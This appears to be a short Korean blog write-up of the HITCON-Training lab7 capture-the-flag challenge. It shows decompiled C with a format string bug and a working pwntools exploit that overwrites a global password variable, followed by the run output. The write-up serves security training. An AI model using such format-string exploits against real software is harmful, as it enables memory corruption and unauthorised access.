Wargame & CTF/HITCON-Training
[HITCON-Training] lab7
cg10036
2019. 11. 18. 07:16
Summary
32bit
format string bug
Analysis
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
unsigned int v3; // eax
int fd; // ST14_4
char nptr; // [esp+8h] [ebp-80h]
char buf; // [esp+18h] [ebp-70h]
unsigned int v8; // [esp+7Ch] [ebp-Ch]
v8 = __readgsdword(0x14u);
setvbuf(_bss_start, 0, 2, 0);
v3 = time(0);
srand(v3);
fd = open("/dev/urandom", 0);
read(fd, &password, 4u);
printf("What your name ? ");
read(0, &buf, 0x63u);
printf("Hello ,");
printf(&buf);
printf("Your password :");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == password )
{
puts("Congrt!!");
system("cat /home/crack/flag");
}
else
{
puts("Goodbyte");
}
return 0;
}이름을 출력하는 쪽에서 포멧스트링 버그가 터진다.
Exploit
from pwn import *
e = ELF("./crack")
p = process("./crack")
p.recvuntil("What your name ? ")
payload = fmtstr_payload(10, {e.symbols["password"] : 0})
p.send(payload)
p.recvuntil("Your password :")
p.send("0")
p.interactive()포멧스트링버그를 이용해서 password를 0으로 바꾸어준 후 비밀번호로 0을 입력하면 된다.
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab7$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab7/crack'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './crack': pid 3233
[*] Switching to interactive mode
Congrt!!
cat: /home/crack/flag: 그런 파일이나 디렉터리가 없습니다